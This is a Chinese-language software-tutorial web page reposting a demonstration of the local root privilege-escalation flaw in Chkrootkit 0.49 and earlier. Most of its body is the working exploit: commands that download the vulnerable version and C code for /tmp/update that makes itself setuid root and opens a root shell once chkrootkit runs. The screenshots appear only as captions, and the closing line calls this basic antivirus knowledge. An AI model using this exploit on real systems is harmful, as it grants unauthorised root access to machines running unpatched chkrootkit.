明辉手游网中心:是一个免费提供流行视频软件教程、在线学习分享的学习平台!

文章发布
全站
软 件 文 章
热门搜索:酷狗音乐 最新 APP 评测 没声音 正常 
资讯首页腾讯视频 爱奇艺 暴风影音 酷狗音乐 酷我音乐影音大全软件下载软件教程电脑系统下载
聊天工具办公软件杀毒教程系统工具图形图像电脑学习应用软件网络软件苹果应用注册码网站教程技术开发安卓教程其它教程
您当前所在位置:网视手游站 -> 杀毒教程 -> Chkrootkit 0.49 本地提权漏洞

Chkrootkit 0.49 本地提权漏洞

发表时间:2023-09-10 来源:明辉站整理相关软件相关文章人气:

[摘要]Chkrootkit <=0.49 Local Root Vulnerability:小于等于0.49版的chrootkit本地提权漏洞。先来演示下吧:可以查看自己安装的是不是升到最新版了,或者下载有漏洞的版本进行实验:wget wget http://www.exploit-db.com/...

Chkrootkit <=0.49 Local Root Vulnerability:小于等于0.49版的chrootkit本地提权漏洞。先来演示下吧:
可以查看自己安装的是不是升到最新版了,或者下载有漏洞的版本进行实验:

wget wget http://www.exploit-db.com/wp-content/themes/exploit/applications/304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz
tar vfxz 304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz
cd chkrootkit-0.49/
./chkrootkit -V
普通用户在 /tmp 目录下新建 update.c(代码实示例如下):

#include <unistd.h>

void main(void)
{
system("chown root:root /tmp/update");
system("chmod 4755 /tmp/update");
setuid(0);
setgid(0);
execl("/bin/sh","sh",NULL);

}
然后编译好 update ,看下update的文件详情:
Chkrootkit 0.49 本地提权漏洞 - xiao106347 - Linux 折腾笔记

执行有漏洞的 chkrootkit :
Chkrootkit 0.49 本地提权漏洞 - xiao106347 - Linux 折腾笔记
 
再来看下 update 已经成功属于 root 组了!
Chkrootkit 0.49 本地提权漏洞 - xiao106347 - Linux 折腾笔记
 

参考资料:
http://www.exploit-db.com/exploits/33899/
hackluom.net/chkrootkit-local-root/Vulnerability
 


上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。




标签:Chkrootkit 0.49 本地提权漏洞 

推荐资讯 总人气榜

最新教程 本月人气

联系我们|版权声明|下载帮助|关于我们|网站地图|手机站
Copyright © 2015-2020 www.22122511.com AllRights Reserved

本站资源均来自互联网收集 如有侵犯到您利益的地方请及时联系管理删除,敬请见谅!